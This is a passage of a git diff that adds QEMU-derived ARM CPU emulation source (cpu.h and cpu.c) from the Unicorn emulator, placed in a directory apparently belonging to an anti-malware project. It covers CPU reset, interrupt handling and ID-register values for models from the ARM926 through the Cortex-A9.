above. 
+ */ + uint64_t *cpreg_vmstate_indexes; + uint64_t *cpreg_vmstate_values; + int32_t cpreg_vmstate_array_len; + + /* Timers used by the generic (architected) timer */ + //QEMUTimer *gt_timer[NUM_GTIMERS]; + /* GPIO outputs for generic timer */ + //qemu_irq gt_timer_outputs[NUM_GTIMERS]; + + /* 'compatible' string for this CPU for Linux device trees */ + const char *dtb_compatible; + + /* PSCI version for this CPU + * Bits[31:16] = Major Version + * Bits[15:0] = Minor Version + */ + uint32_t psci_version; + + /* Should CPU start in PSCI powered-off state? */ + bool start_powered_off; + /* CPU currently in PSCI powered-off state */ + bool powered_off; + + /* PSCI conduit used to invoke PSCI methods + * 0 - disabled, 1 - smc, 2 - hvc + */ + uint32_t psci_conduit; + + /* [QEMU_]KVM_ARM_TARGET_* constant for this CPU, or + * QEMU_KVM_ARM_TARGET_NONE if the kernel doesn't support this CPU type. + */ + uint32_t kvm_target; + + /* KVM init features for this CPU */ + uint32_t kvm_init_features[7]; + + /* The instance init functions for implementation-specific subclasses + * set these fields to specify the implementation-dependent values of + * various constant registers and reset values of non-constant + * registers. + * Some of these might become QOM properties eventually. + * Field names match the official register names as defined in the + * ARMv7AR ARM Architecture Reference Manual. A reset_ prefix + * is used for reset values of non-constant registers; no reset_ + * prefix means a constant register. 
+ */ + uint32_t midr; + uint32_t reset_fpsid; + uint32_t mvfr0; + uint32_t mvfr1; + uint32_t mvfr2; + uint32_t ctr; + uint32_t reset_sctlr; + uint32_t id_pfr0; + uint32_t id_pfr1; + uint32_t id_dfr0; + uint32_t id_afr0; + uint32_t id_mmfr0; + uint32_t id_mmfr1; + uint32_t id_mmfr2; + uint32_t id_mmfr3; + uint32_t id_isar0; + uint32_t id_isar1; + uint32_t id_isar2; + uint32_t id_isar3; + uint32_t id_isar4; + uint32_t id_isar5; + uint64_t id_aa64pfr0; + uint64_t id_aa64pfr1; + uint64_t id_aa64dfr0; + uint64_t id_aa64dfr1; + uint64_t id_aa64afr0; + uint64_t id_aa64afr1; + uint64_t id_aa64isar0; + uint64_t id_aa64isar1; + uint64_t id_aa64mmfr0; + uint64_t id_aa64mmfr1; + uint32_t dbgdidr; + uint32_t clidr; + /* The elements of this array are the CCSIDR values for each cache, + * in the order L1DCache, L1ICache, L2DCache, L2ICache, etc. + */ + uint32_t ccsidr[16]; + uint64_t reset_cbar; + uint32_t reset_auxcr; + bool reset_hivecs; + /* DCZ blocksize, in log_2(words), ie low 4 bits of DCZID_EL0 */ + uint32_t dcz_blocksize; + uint64_t rvbar; +} ARMCPU; + +#define TYPE_AARCH64_CPU "aarch64-cpu" +#define AARCH64_CPU_CLASS(klass) \ + OBJECT_CLASS_CHECK(AArch64CPUClass, (klass), TYPE_AARCH64_CPU) +#define AARCH64_CPU_GET_CLASS(obj) \ + OBJECT_GET_CLASS(AArch64CPUClass, (obj), TYPE_AArch64_CPU) + +typedef struct AArch64CPUClass { + /*< private >*/ + ARMCPUClass parent_class; + /*< public >*/ +} AArch64CPUClass; + +static inline ARMCPU *arm_env_get_cpu(CPUARMState *env) +{ + return container_of(env, ARMCPU, env); +} + +#define ENV_GET_CPU(e) CPU(arm_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(ARMCPU, env) + +#ifndef CONFIG_USER_ONLY +extern const struct VMStateDescription vmstate_arm_cpu; +#endif + +void register_cp_regs_for_features(ARMCPU *cpu); +void init_cpreg_list(ARMCPU *cpu); + +void arm_cpu_do_interrupt(CPUState *cpu); +void arm_v7m_cpu_do_interrupt(CPUState *cpu); +bool arm_cpu_exec_interrupt(CPUState *cpu, int int_req); + +hwaddr 
arm_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); + +int arm_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int arm_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +/* Callback functions for the generic timer's timers. */ +void arm_gt_ptimer_cb(void *opaque); +void arm_gt_vtimer_cb(void *opaque); + +#ifdef TARGET_AARCH64 +int aarch64_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int aarch64_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +void aarch64_cpu_do_interrupt(CPUState *cs); +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.c new file mode 100644 index 0000000..7a0b839 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu.c @@ -0,0 +1,1108 @@ +/* + * QEMU ARM CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ + +#include "cpu.h" +#include "internals.h" +#include "qemu-common.h" +#include "qapi/qmp/qerror.h" +#include "hw/arm/arm.h" +#include "sysemu/sysemu.h" + +#include "uc_priv.h" + +static void arm_cpu_set_pc(CPUState *cs, vaddr value) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + + cpu->env.regs[15] = value; +} + +static bool arm_cpu_has_work(CPUState *cs) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + + return !cpu->powered_off + && cs->interrupt_request & + (CPU_INTERRUPT_FIQ | CPU_INTERRUPT_HARD + | CPU_INTERRUPT_VFIQ | CPU_INTERRUPT_VIRQ + | CPU_INTERRUPT_EXITTB); +} + +static void cp_reg_reset(gpointer key, gpointer value, gpointer opaque) +{ + /* Reset a single ARMCPRegInfo register */ + ARMCPRegInfo *ri = value; + ARMCPU *cpu = opaque; + + if (ri->type & ARM_CP_SPECIAL) { + return; + } + + if (ri->resetfn) { + ri->resetfn(&cpu->env, ri); + return; + } + + /* A zero offset is never possible as it would be regs[0] + * so we use it to indicate that reset is being handled elsewhere. + * This is basically only used for fields in non-core coprocessors + * (like the pxa2xx ones). 
+ */ + if (!ri->fieldoffset) { + return; + } + + if (cpreg_field_is_64bit(ri)) { + CPREG_FIELD64(&cpu->env, ri) = ri->resetvalue; + } else { + CPREG_FIELD32(&cpu->env, ri) = ri->resetvalue; + } +} + +/* CPUClass::reset() */ +static void arm_cpu_reset(CPUState *s) +{ + CPUARMState *env = s->env_ptr; + ARMCPU *cpu = ARM_CPU(env->uc, s); + ARMCPUClass *acc = ARM_CPU_GET_CLASS(env->uc, cpu); + + acc->parent_reset(s); + + memset(env, 0, offsetof(CPUARMState, features)); + g_hash_table_foreach(cpu->cp_regs, cp_reg_reset, cpu); + env->vfp.xregs[ARM_VFP_FPSID] = cpu->reset_fpsid; + env->vfp.xregs[ARM_VFP_MVFR0] = cpu->mvfr0; + env->vfp.xregs[ARM_VFP_MVFR1] = cpu->mvfr1; + env->vfp.xregs[ARM_VFP_MVFR2] = cpu->mvfr2; + + cpu->powered_off = cpu->start_powered_off; + s->halted = cpu->start_powered_off; + + if (arm_feature(env, ARM_FEATURE_IWMMXT)) { + env->iwmmxt.cregs[ARM_IWMMXT_wCID] = 0x69051000 | 'Q'; + } + + if (arm_feature(env, ARM_FEATURE_AARCH64)) { + /* 64 bit CPUs always start in 64 bit mode */ + env->aarch64 = 1; +#if defined(CONFIG_USER_ONLY) + env->pstate = PSTATE_MODE_EL0t; + /* Userspace expects access to DC ZVA, CTL_EL0 and the cache ops */ + env->cp15.c1_sys |= SCTLR_UCT | SCTLR_UCI | SCTLR_DZE; + /* and to the FP/Neon instructions */ + env->cp15.c1_coproc = deposit64(env->cp15.c1_coproc, 20, 2, 3); +#else + env->pstate = PSTATE_MODE_EL1h; + env->pc = cpu->rvbar; +#endif + } else { +#if defined(CONFIG_USER_ONLY) + /* Userspace expects access to cp10 and cp11 for FP/Neon */ + env->cp15.c1_coproc = deposit64(env->cp15.c1_coproc, 20, 4, 0xf); +#endif + } + +#if defined(CONFIG_USER_ONLY) + env->uncached_cpsr = ARM_CPU_MODE_USR; + /* For user mode we must enable access to coprocessors */ + env->vfp.xregs[ARM_VFP_FPEXC] = 1 << 30; + if (arm_feature(env, ARM_FEATURE_IWMMXT)) { + env->cp15.c15_cpar = 3; + } else if (arm_feature(env, ARM_FEATURE_XSCALE)) { + env->cp15.c15_cpar = 1; + } +#else + /* SVC mode with interrupts disabled. 
*/ + env->uncached_cpsr = ARM_CPU_MODE_SVC; + env->daif = PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F; + /* On ARMv7-M the CPSR_I is the value of the PRIMASK register, and is + * clear at reset. Initial SP and PC are loaded from ROM. + */ + if (IS_M(env)) { + uint32_t initial_msp; /* Loaded from 0x0 */ + uint32_t initial_pc; /* Loaded from 0x4 */ + + env->daif &= ~PSTATE_I; +#if 0 + uint8_t *rom; + rom = rom_ptr(0); + if (rom) { + /* Address zero is covered by ROM which hasn't yet been + * copied into physical memory. + */ + initial_msp = ldl_p(rom); + initial_pc = ldl_p(rom + 4); + } else +#endif + { + /* Address zero not covered by a ROM blob, or the ROM blob + * is in non-modifiable memory and this is a second reset after + * it got copied into memory. In the latter case, rom_ptr + * will return a NULL pointer and we should use ldl_phys instead. + */ + initial_msp = ldl_phys(s->as, 0); + initial_pc = ldl_phys(s->as, 4); + } + + env->regs[13] = initial_msp & 0xFFFFFFFC; + env->regs[15] = initial_pc & ~1; + env->thumb = initial_pc & 1; + } + + // Unicorn: force Thumb mode by setting of uc_open() + env->thumb = env->uc->thumb; + + if (env->cp15.c1_sys & SCTLR_V) { + env->regs[15] = 0xFFFF0000; + } + + env->vfp.xregs[ARM_VFP_FPEXC] = 0; +#endif + set_flush_to_zero(1, &env->vfp.standard_fp_status); + set_flush_inputs_to_zero(1, &env->vfp.standard_fp_status); + set_default_nan_mode(1, &env->vfp.standard_fp_status); + set_float_detect_tininess(float_tininess_before_rounding, + &env->vfp.fp_status); + set_float_detect_tininess(float_tininess_before_rounding, + &env->vfp.standard_fp_status); + tlb_flush(s, 1); + + hw_breakpoint_update_all(cpu); + hw_watchpoint_update_all(cpu); +} + +bool arm_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + CPUARMState *env = cs->env_ptr; + CPUClass *cc = CPU_GET_CLASS(env->uc, cs); + bool ret = false; + + if (interrupt_request & CPU_INTERRUPT_FIQ + && arm_excp_unmasked(cs, EXCP_FIQ)) { + cs->exception_index = EXCP_FIQ; + 
cc->do_interrupt(cs); + ret = true; + } + if (interrupt_request & CPU_INTERRUPT_HARD + && arm_excp_unmasked(cs, EXCP_IRQ)) { + cs->exception_index = EXCP_IRQ; + cc->do_interrupt(cs); + ret = true; + } + if (interrupt_request & CPU_INTERRUPT_VIRQ + && arm_excp_unmasked(cs, EXCP_VIRQ)) { + cs->exception_index = EXCP_VIRQ; + cc->do_interrupt(cs); + ret = true; + } + if (interrupt_request & CPU_INTERRUPT_VFIQ + && arm_excp_unmasked(cs, EXCP_VFIQ)) { + cs->exception_index = EXCP_VFIQ; + cc->do_interrupt(cs); + ret = true; + } + + return ret; +} + +#if !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) +static bool arm_v7m_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + CPUARMState *env = cs->env_ptr; + CPUClass *cc = CPU_GET_CLASS(env->uc, cs); + bool ret = false; + + + if (interrupt_request & CPU_INTERRUPT_FIQ + && !(env->daif & PSTATE_F)) { + cs->exception_index = EXCP_FIQ; + cc->do_interrupt(cs); + ret = true; + } + /* ARMv7-M interrupt return works by loading a magic value + * into the PC. On real hardware the load causes the + * return to occur. The qemu implementation performs the + * jump normally, then does the exception return when the + * CPU tries to execute code at the magic address. + * This will cause the magic PC value to be pushed to + * the stack if an interrupt occurred at the wrong time. + * We avoid this by disabling interrupts when + * pc contains a magic address. 
+ */ + if (interrupt_request & CPU_INTERRUPT_HARD + && !(env->daif & PSTATE_I) + && (env->regs[15] < 0xfffffff0)) { + cs->exception_index = EXCP_IRQ; + cc->do_interrupt(cs); + ret = true; + } + return ret; +} +#endif + +static inline void set_feature(CPUARMState *env, int feature) +{ + env->features |= 1ULL << feature; +} + +static void arm_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + CPUState *cs = CPU(obj); + ARMCPU *cpu = ARM_CPU(uc, obj); + + cs->env_ptr = &cpu->env; + cpu_exec_init(&cpu->env, opaque); + cpu->cp_regs = g_hash_table_new_full(g_int_hash, g_int_equal, + g_free, g_free); + +#if 0 +#ifndef CONFIG_USER_ONLY + /* Our inbound IRQ and FIQ lines */ + + cpu->gt_timer[GTIMER_PHYS] = timer_new(QEMU_CLOCK_VIRTUAL, GTIMER_SCALE, + arm_gt_ptimer_cb, cpu); + cpu->gt_timer[GTIMER_VIRT] = timer_new(QEMU_CLOCK_VIRTUAL, GTIMER_SCALE, + arm_gt_vtimer_cb, cpu); + //qdev_init_gpio_out(DEVICE(cpu), cpu->gt_timer_outputs, + // ARRAY_SIZE(cpu->gt_timer_outputs)); +#endif +#endif + + /* DTB consumers generally don't in fact care what the 'compatible' + * string is, so always provide some string and trust that a hypothetical + * picky DTB consumer will also provide a helpful error message. 
+ */ + cpu->dtb_compatible = "qemu,unknown"; + cpu->psci_version = 1; /* By default assume PSCI v0.1 */ + cpu->kvm_target = QEMU_KVM_ARM_TARGET_NONE; + + if (tcg_enabled(uc)) { + cpu->psci_version = 2; /* TCG implements PSCI 0.2 */ + arm_translate_init(uc); + } +} + +static void arm_cpu_post_init(struct uc_struct *uc, Object *obj) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + if (arm_feature(&cpu->env, ARM_FEATURE_CBAR) || + arm_feature(&cpu->env, ARM_FEATURE_CBAR_RO)) { + //qdev_property_add_static(DEVICE(obj), &arm_cpu_reset_cbar_property, + // &error_abort); + } + + if (!arm_feature(&cpu->env, ARM_FEATURE_M)) { + //qdev_property_add_static(DEVICE(obj), &arm_cpu_reset_hivecs_property, + // &error_abort); + } + + if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { + //qdev_property_add_static(DEVICE(obj), &arm_cpu_rvbar_property, + // &error_abort); + } +} + +static void arm_cpu_finalizefn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + g_hash_table_destroy(cpu->cp_regs); +} + +static int arm_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + ARMCPU *cpu = ARM_CPU(uc, dev); + ARMCPUClass *acc = ARM_CPU_GET_CLASS(uc, dev); + CPUARMState *env = &cpu->env; + + /* Some features automatically imply others: */ + if (arm_feature(env, ARM_FEATURE_V8)) { + set_feature(env, ARM_FEATURE_V7); + set_feature(env, ARM_FEATURE_ARM_DIV); + set_feature(env, ARM_FEATURE_LPAE); + } + if (arm_feature(env, ARM_FEATURE_V7)) { + set_feature(env, ARM_FEATURE_VAPA); + set_feature(env, ARM_FEATURE_THUMB2); + set_feature(env, ARM_FEATURE_MPIDR); + if (!arm_feature(env, ARM_FEATURE_M)) { + set_feature(env, ARM_FEATURE_V6K); + } else { + set_feature(env, ARM_FEATURE_V6); + } + } + if (arm_feature(env, ARM_FEATURE_V6K)) { + set_feature(env, ARM_FEATURE_V6); + set_feature(env, ARM_FEATURE_MVFR); + } + if (arm_feature(env, ARM_FEATURE_V6)) { + set_feature(env, ARM_FEATURE_V5); + if (!arm_feature(env, 
ARM_FEATURE_M)) { + set_feature(env, ARM_FEATURE_AUXCR); + } + } + if (arm_feature(env, ARM_FEATURE_V5)) { + set_feature(env, ARM_FEATURE_V4T); + } + if (arm_feature(env, ARM_FEATURE_M)) { + set_feature(env, ARM_FEATURE_THUMB_DIV); + } + if (arm_feature(env, ARM_FEATURE_ARM_DIV)) { + set_feature(env, ARM_FEATURE_THUMB_DIV); + } + if (arm_feature(env, ARM_FEATURE_VFP4)) { + set_feature(env, ARM_FEATURE_VFP3); + set_feature(env, ARM_FEATURE_VFP_FP16); + } + if (arm_feature(env, ARM_FEATURE_VFP3)) { + set_feature(env, ARM_FEATURE_VFP); + } + if (arm_feature(env, ARM_FEATURE_LPAE)) { + set_feature(env, ARM_FEATURE_V7MP); + set_feature(env, ARM_FEATURE_PXN); + } + if (arm_feature(env, ARM_FEATURE_CBAR_RO)) { + set_feature(env, ARM_FEATURE_CBAR); + } + + if (cpu->reset_hivecs) { + cpu->reset_sctlr |= (1 << 13); + } + + register_cp_regs_for_features(cpu); + arm_cpu_register_gdb_regs_for_features(cpu); + + init_cpreg_list(cpu); + + qemu_init_vcpu(cs); + cpu_reset(cs); + + acc->parent_realize(uc, dev, errp); + + return 0; +} + +static ObjectClass *arm_cpu_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + ObjectClass *oc; + char *typename; + + if (!cpu_model) { + return NULL; + } + + typename = g_strdup_printf("%s-" TYPE_ARM_CPU, cpu_model); + oc = object_class_by_name(uc, typename); + g_free(typename); + if (!oc || !object_class_dynamic_cast(uc, oc, TYPE_ARM_CPU) || + object_class_is_abstract(oc)) { + return NULL; + } + return oc; +} + +/* CPU models. These are not needed for the AArch64 linux-user build. 
*/ +#if !defined(CONFIG_USER_ONLY) || !defined(TARGET_AARCH64) + +static void arm926_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm926"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); + cpu->midr = 0x41069265; + cpu->reset_fpsid = 0x41011090; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00090078; +} + +static void arm946_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm946"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_MPU); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x41059461; + cpu->ctr = 0x0f004006; + cpu->reset_sctlr = 0x00000078; +} + +static void arm1026_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm1026"; + set_feature(&cpu->env, ARM_FEATURE_V5); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_AUXCR); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); + cpu->midr = 0x4106a262; + cpu->reset_fpsid = 0x410110a0; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00090078; + cpu->reset_auxcr = 1; + { + /* The 1026 had an IFAR at c6,c0,0,1 rather than the ARMv6 c6,c0,0,2 */ + ARMCPRegInfo ifar = { 0 }; + ifar.name = "IFAR"; + ifar.cp = 15; + ifar.crn = 6; + ifar.crm = 0; + ifar.opc1 = 0; + ifar.opc2 = 1; + ifar.access = PL1_RW; + ifar.fieldoffset = offsetofhigh32(CPUARMState, cp15.far_el[1]); + ifar.resetvalue = 0; + define_one_arm_cp_reg(cpu, &ifar); + } +} + +static void arm1136_r2_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + /* What qemu calls "arm1136_r2" is actually the 1136 r0p2, 
ie an + * older core than plain "arm1136". In particular this does not + * have the v6K features. + * These ID register values are correct for 1136 but may be wrong + * for 1136_r2 (in particular r0p2 does not actually implement most + * of the ID registers). + */ + + cpu->dtb_compatible = "arm,arm1136"; + set_feature(&cpu->env, ARM_FEATURE_V6); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); + set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); + cpu->midr = 0x4107b362; + cpu->reset_fpsid = 0x410120b4; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00050078; + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x1; + cpu->id_dfr0 = 0x2; + cpu->id_afr0 = 0x3; + cpu->id_mmfr0 = 0x01130003; + cpu->id_mmfr1 = 0x10030302; + cpu->id_mmfr2 = 0x01222110; + cpu->id_isar0 = 0x00140011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11231111; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x141; + cpu->reset_auxcr = 7; +} + +static void arm1136_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm1136"; + set_feature(&cpu->env, ARM_FEATURE_V6K); + set_feature(&cpu->env, ARM_FEATURE_V6); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); + set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); + cpu->midr = 0x4117b363; + cpu->reset_fpsid = 0x410120b4; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00050078; + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x1; + cpu->id_dfr0 = 0x2; + cpu->id_afr0 = 0x3; + cpu->id_mmfr0 = 0x01130003; + cpu->id_mmfr1 = 0x10030302; + cpu->id_mmfr2 = 0x01222110; + cpu->id_isar0 = 0x00140011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11231111; + cpu->id_isar3 = 0x01102131; + 
cpu->id_isar4 = 0x141; + cpu->reset_auxcr = 7; +} + +static void arm1176_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm1176"; + set_feature(&cpu->env, ARM_FEATURE_V6K); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_VAPA); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); + set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); + cpu->midr = 0x410fb767; + cpu->reset_fpsid = 0x410120b5; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1dd20d2; + cpu->reset_sctlr = 0x00050078; + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x11; + cpu->id_dfr0 = 0x33; + cpu->id_afr0 = 0; + cpu->id_mmfr0 = 0x01130003; + cpu->id_mmfr1 = 0x10030302; + cpu->id_mmfr2 = 0x01222100; + cpu->id_isar0 = 0x0140011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11231121; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x01141; + cpu->reset_auxcr = 7; +} + +static void arm11mpcore_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,arm11mpcore"; + set_feature(&cpu->env, ARM_FEATURE_V6K); + set_feature(&cpu->env, ARM_FEATURE_VFP); + set_feature(&cpu->env, ARM_FEATURE_VAPA); + set_feature(&cpu->env, ARM_FEATURE_MPIDR); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x410fb022; + cpu->reset_fpsid = 0x410120b4; + cpu->mvfr0 = 0x11111111; + cpu->mvfr1 = 0x00000000; + cpu->ctr = 0x1d192992; /* 32K icache 32K dcache */ + cpu->id_pfr0 = 0x111; + cpu->id_pfr1 = 0x1; + cpu->id_dfr0 = 0; + cpu->id_afr0 = 0x2; + cpu->id_mmfr0 = 0x01100103; + cpu->id_mmfr1 = 0x10020302; + cpu->id_mmfr2 = 0x01222000; + cpu->id_isar0 = 0x00100011; + cpu->id_isar1 = 0x12002111; + cpu->id_isar2 = 0x11221011; + cpu->id_isar3 = 0x01102131; + cpu->id_isar4 = 0x141; + cpu->reset_auxcr = 1; +} + +static void cortex_m3_initfn(struct uc_struct *uc, Object 
*obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_M); + cpu->midr = 0x410fc231; +} + +static void arm_v7m_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + CPUClass *cc = CPU_CLASS(uc, oc); + +#ifndef CONFIG_USER_ONLY + cc->do_interrupt = arm_v7m_cpu_do_interrupt; +#endif + + cc->cpu_exec_interrupt = arm_v7m_cpu_exec_interrupt; +} + +static const ARMCPRegInfo cortexa8_cp_reginfo[] = { + { "L2LOCKDOWN", 15,9,0, 0,1,0, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "L2AUXCR", 15,9,0, 0,1,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + REGINFO_SENTINEL +}; + +static void cortex_a8_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,cortex-a8"; + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_VFP3); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); + cpu->midr = 0x410fc080; + cpu->reset_fpsid = 0x410330c0; + cpu->mvfr0 = 0x11110222; + cpu->mvfr1 = 0x00011100; + cpu->ctr = 0x82048004; + cpu->reset_sctlr = 0x00c50078; + cpu->id_pfr0 = 0x1031; + cpu->id_pfr1 = 0x11; + cpu->id_dfr0 = 0x400; + cpu->id_afr0 = 0; + cpu->id_mmfr0 = 0x31100003; + cpu->id_mmfr1 = 0x20000000; + cpu->id_mmfr2 = 0x01202000; + cpu->id_mmfr3 = 0x11; + cpu->id_isar0 = 0x00101111; + cpu->id_isar1 = 0x12112111; + cpu->id_isar2 = 0x21232031; + cpu->id_isar3 = 0x11112131; + cpu->id_isar4 = 0x00111142; + cpu->dbgdidr = 0x15141000; + cpu->clidr = (1 << 27) | (2 << 24) | 3; + cpu->ccsidr[0] = 0xe007e01a; /* 16k L1 dcache. */ + cpu->ccsidr[1] = 0x2007e01a; /* 16k L1 icache. */ + cpu->ccsidr[2] = 0xf0000000; /* No L2 icache. */ + cpu->reset_auxcr = 2; + define_arm_cp_regs(cpu, cortexa8_cp_reginfo); +} + +static const ARMCPRegInfo cortexa9_cp_reginfo[] = { + /* power_control should be set to maximum latency. 
Again, + * default to 0 and set by private hook + */ + { "A9_PWRCTL", 15,15,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_power_control) }, + { "A9_DIAG", 15,15,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_diagnostic) }, + { "A9_PWRDIAG",15,15,0, 0,0,2, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_power_diagnostic) }, + { "NEONBUSY", 15,15,1, 0,0,0, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + /* TLB lockdown control */ + { "TLB_LOCKR", 15,15,4, 0,5,2, 0, + ARM_CP_NOP, PL1_W, NULL, 0 }, + { "TLB_LOCKW", 15,15,4, 0,5,4, 0, + ARM_CP_NOP, PL1_W, NULL, 0, }, + { "TLB_VA", 15,15,5, 0,5,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "TLB_PA", 15,15,6, 0,5,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "TLB_ATTR", 15,15,7, 0,5,2, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + REGINFO_SENTINEL +}; + +static void cortex_a9_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + cpu->dtb_compatible = "arm,cortex-a9"; + set_feature(&cpu->env, ARM_FEATURE_V7); + set_feature(&cpu->env, ARM_FEATURE_VFP3); + set_feature(&cpu->env, ARM_FEATURE_VFP_FP16); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); + /* Note that A9 supports the MP extensions even for + * A9UP and single-core A9MP (which are both different + * and valid configurations; we don't model A9UP). 
